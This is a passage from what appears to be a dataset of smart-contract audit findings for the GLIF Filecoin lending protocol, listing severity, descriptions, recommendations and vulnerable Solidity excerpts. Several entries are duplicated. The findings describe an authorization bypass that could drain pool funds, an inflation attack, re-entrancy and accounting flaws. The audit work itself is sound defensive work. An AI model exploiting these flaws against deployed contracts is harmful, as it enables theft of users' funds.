sendAmount);\\n}\\nelse if (msg.sender != owner()) {\\n revert Unauthorized();\\n}\\n\\n// unwrap any wfil needed to withdraw\\n\\_poolFundsInFIL(sendAmount);\\n// transfer funds\\npayable(receiver).sendValue(sendAmount);\\n```\\n\\nThe issue is 
that anyone can call this function directly, and the quota will be reduced without funds being transferred.чEnsure only the Agent can call this function.чч```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n -An Agent can borrow even with existing debt in interest paymentsчmediumчTo `borrow` funds, an `Agent` has to call the `borrow` function of the pool:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, 
vc.value);\\n}\\n```\\n\\nLet's assume that the `Agent` already had some funds borrowed. During this function execution, the current debt status is not checked. The principal debt increases after borrowing, but `account.epochsPaid` remains the same. So the pending debt will instantly increase as if the borrowing happened on `account.epochsPaid`.чEnsure the debt is paid when borrowing more funds.чч```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n -The AgentPolice.distributeLiquidatedFunds() function can have undistributed residual fundsчmediumчWhen an Agent is liquidated, the liquidator (owner of the protocol) is supposed to try to redeem as many funds as possible and re-distribute them to the pools:\\n```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n\\nThe problem is that in the pool, it's accounted that the 
amount of funds can be larger than the debt. In that case, the pool won't transfer more funds than the pool needs:\\n```\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n\\nemit WriteOff(agentID, recoveredFunds, lostAmt, interestPaid);\\n```\\n\\nIf that happens, the remaining funds will be stuck in the `AgentPolice` contract.чReturn the residual funds to the Agent's owner or process them in some way so they are not lost.чч```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n -An Agent can be upgraded even if there is no new implementationчmediumчAgents can be upgraded to a new implementation, and only the Agent's owner can call the upgrade function:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n 
oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nThe issue is that the owner can trigger the upgrade even if no new implementation exists. Multiple possible problems derive from it.\\nUpgrading to the current implementation of the Agent will break the logic because the current version is not calling the `migrateMiner` function, so all the miners will stay with the old Agent, and their funds will be lost.\\nThe owner can accidentally trigger multiple upgrades simultaneously, leading to a loss of funds (https://github.com/ConsenSysDiligence/glif-audit-2023-04/issues/2).\\nThe owner also has no control over the new version of the Agent. To increase decentralization, it's better to pass the deployer's address as a parameter additionally.чEnsure the upgrades can only happen when there is a new version of an Agent, and the owner controls this version.чч```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n -Potential re-entrancy issues when upgrading the contractsчlowчThe protocol doesn't have any built-in re-entrancy protection mechanisms. 
That mainly explains by using the `wFIL` token, which is not supposed to give that opportunity. And also by carefully using `FIL` transfers.\\nHowever, there are some places in the code where things may go wrong in the future. For example, when upgrading an Agent:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nHere, we see the `oldAgent.decommissionAgent(newAgent);` call happens before the `oldAgent` is deleted. Inside this function, we see:\\n```\\nfunction decommissionAgent(address \\_newAgent) external {\\n // only the agent factory can decommission an agent\\n AuthController.onlyAgentFactory(router, msg.sender);\\n // if the newAgent has a mismatching ID, revert\\n if(IAgent(\\_newAgent).id() != id) revert Unauthorized();\\n // set the newAgent in storage, which marks the upgrade process as starting\\n newAgent = \\_newAgent;\\n uint256 \\_liquidAssets = liquidAssets();\\n // Withdraw all liquid funds from the Agent to the newAgent\\n \\_poolFundsInFIL(\\_liquidAssets);\\n // transfer funds to new agent\\n payable(\\_newAgent).sendValue(\\_liquidAssets);\\n}\\n```\\n\\nHere, the FIL is transferred to a new contract which is currently unimplemented and unknown. 
Potentially, the fallback function of this contract could trigger a re-entrancy attack. If that's the case, during the execution of this function, there will be two contracts that are active agents with the same ID, and the attacker can try to use that maliciously.чBe very cautious with further implementations of agents and pools. Also, consider using reentrancy protection in public functions.чч```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n -InfinityPool is subject to a donation with inflation attack if emptied.чlowчSince `InfinityPool` is an implementation of the ERC4626 vault, it is also susceptible to inflation attacks. An attacker could front-run the first deposit and inflate the share price to an extent where the following deposit will be less than the value of 1 wei of share resulting in 0 shares minted. The attacker could conduct the inflation by means of self-destructing of another contract. In the case of GLIF this attack is less likely on the first pool since GLIF team accepts predeposits so some amount of shares was already minted. 
We do suggest fixing this issue before the next pool is deployed and no pre-stake is generated.\\n```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\nчSince the pool does not need to accept donations, the easiest way to handle this case is to use virtual price, where the balance of the contract is duplicated in a separate variable.чч```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? 
assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n -MaxWithdraw should potentially account for the funds available in the ramp.чlowчSince `InfinityPool` is ERC4626 it should also support the `MaxWithdraw` method. According to the EIP it should include any withdrawal limitation that the participant could encounter. At the moment the `MaxWithdraw` function returns the maximum amount of IOU tokens rather than WFIL. Since IOU token is not the `asset` token of the vault, this behavior is not ideal.\\n```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\nчWe suggest considering returning the maximum amount of WFIL withdrawal which should account for Ramp balance.чч```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n -The upgradeability of MinerRegistry, AgentPolice, and Agent is overcomplicated and has a high chance of errors. AcknowledgedчlowчDuring the engagement, we have identified a few places that signify that the `Agent`, `MinerRegistry` and `AgentPolice` can be upgraded, for example:\\nAbility to migrate the miner from one version of the Agent to another inside the `migrateMiner`.\\nAbility to `refreshRoutes` that would update the `AgentPolice` and `MinerRegistry` addresses for a given Agent.\\nAbility to `decommission` pool. We believe that while this functionality is present, it is not very well thought through. 
For example, both `MinerRegistry` and `AgentPolice` are not upgradable but have mappings inside of them.\\n```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n\\n```\\nmapping(bytes32 => bool) private \\_minerRegistered;\\n\\nmapping(uint256 => uint64[]) private \\_minersByAgent;\\n```\\n\\nThat means that any time these contracts would need to be upgraded, the contents of those mappings will need to be somehow recreated in the new contract. That is not trivial since it is not easy to obtain all values of a mapping. This will also require an additional protocol-controlled setter ala kickstart mapping functions that are not ideal.\\nIn the case of `Agent` if the contract was upgradable there would be no need for a process of migrating miners that can be tedious and opens possibilities for errors. Since protocol has a lot of centralization and trust assumptions already, having upgradability will not contribute to it a lot.\\nWe also believe that during the upgrade of the pool, the PoolToken will stay the same in the new pool. That means that the minting and burning permissions of the share tokens have to be carefully updated or checked in a manner that does not require the address of the pool to be constant. 
Since we did not have access to this file, we can not check if that is done correctly.чConsider using upgradable contracts or have a solid upgrade plan that is well-tested before an emergency situation occurs.чч```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n -Mint function in the Infinity pool will emit the incorrect value.чlowчIn the `InfinityPool` file the `mint` function recomputes the amount of the assets before emitting the event. While this is fine in a lot of cases, that will not always be true. The result of `previewMint` and `convertToAssets` will only be equal while the `totalAssets` and `totalSupply` are equal. 
For example, this assumption will break after the first liquidation.\\n```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\nчUse the `assets` value computed by the `previewMint` when emitting the event.чч```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n -Potential overpayment due to rounding imprecision Won't FixчlowчInside the `InfinityPool` the `pay` function might accept unaccounted FIL. Imagine a situation where an Agent is trying to repay only the fees portion of the debt. 
In that case, the following branch will be executed:\\n```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n\\nThe issue is if the `value` does not divide by the `interestPerEpoch` exactly, any remainder will remain in the InfinityPool.\\n```\\nuint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n```\\nчSince the remainder will most likely not be too large this is not critical, but ideally, those remaining funds would be included in the `refund` variable.чч```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n -jumpStartAccount should be subject to the same approval checks as regular borrow.чlowч`InfinityPool` contract has the ability to kick start an account that will have a debt position in this pool.\\n```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n 
account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\nчWe suggest that this action is subject to the same rules as the standard borrow action. Thus checks on DTE, LTV and DTI should be done if possible.чч```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n -InfinityPool Contract Authorization Bypass AttackчhighчAn attacker could create their own credential and set the `Agent` ID to `0`, which would bypass the `subjectIsAgentCaller` modifier. The attacker could use this attack to `borrow` funds from the pool, draining any available liquidity. 
For example, only an `Agent` should be able to `borrow` funds from the pool and call the `borrow` function:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nThe following modifier checks that the caller is an Agent:\\n```\\nmodifier subjectIsAgentCaller(VerifiableCredential memory vc) {\\n if (\\n GetRoute.agentFactory(router).agents(msg.sender) != vc.subject\\n ) revert Unauthorized();\\n \\_;\\n}\\n```\\n\\nBut if the caller is not an `Agent`, the `GetRoute.agentFactory(router).agents(msg.sender)` will return `0`. And if the `vc.subject` is also zero, the check will be successful with any `msg.sender`. 
The attacker can also pass an arbitrary `vc.value` as the parameter and steal all the funds from the pool.чEnsure only an `Agent` can call `borrow` and pass the `subjectIsAgentCaller` modifier.чч```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n -Wrong Accounting for totalBorrowed in the InfinityPool.writeOff FunctionчhighчHere is a part of the `InfinityPool.writeOff` function:\\n```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n\\nThe `totalBorrowed` is decreased by the `lostAmt` value. 
Instead, it should be decreased by the original `account.principal` value to acknowledge the loss.чResolution\\nFixed.чч```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n -The beneficiaryWithdrawable Function Can Be Called by AnyoneчhighчThe `beneficiaryWithdrawable` function is supposed to be called by the Agent when a beneficiary is trying to withdraw funds:\\n```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n\\nThis function reduces the quota that is supposed to be transferred during the `withdraw` call:\\n```\\n sendAmount = agentPolice.beneficiaryWithdrawable(receiver, msg.sender, id, sendAmount);\\n}\\nelse if (msg.sender != owner()) {\\n revert Unauthorized();\\n}\\n\\n// unwrap any wfil needed to withdraw\\n\\_poolFundsInFIL(sendAmount);\\n// transfer funds\\npayable(receiver).sendValue(sendAmount);\\n```\\n\\nThe issue is 
that anyone can call this function directly, and the quota will be reduced without funds being transferred.чEnsure only the Agent can call this function.чч```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n -An Agent Can Borrow Even With Existing Debt in Interest PaymentsчmediumчTo `borrow` funds, an `Agent` has to call the `borrow` function of the pool:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, 
vc.value);\\n}\\n```\\n\\nLet's assume that the `Agent` already had some funds borrowed. During this function execution, the current debt status is not checked. The principal debt increases after borrowing, but `account.epochsPaid` remains the same. So the pending debt will instantly increase as if the borrowing happened on `account.epochsPaid`.чEnsure the debt is paid when borrowing more funds.чч```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n -The AgentPolice.distributeLiquidatedFunds() Function Can Have Undistributed Residual FundsчmediumчWhen an Agent is liquidated, the liquidator (owner of the protocol) is supposed to try to redeem as many funds as possible and re-distribute them to the pools:\\n```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n\\nThe problem is that in the pool, it's accounted that the 
amount of funds can be larger than the debt. In that case, the pool won't transfer more funds than the pool needs:\\n```\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n\\nemit WriteOff(agentID, recoveredFunds, lostAmt, interestPaid);\\n```\\n\\nIf that happens, the remaining funds will be stuck in the `AgentPolice` contract.чReturn the residual funds to the Agent's owner or process them in some way so they are not lost.чч```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n -An Agent Can Be Upgraded Even if There Is No New ImplementationчmediumчAgents can be upgraded to a new implementation, and only the Agent's owner can call the upgrade function:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n 
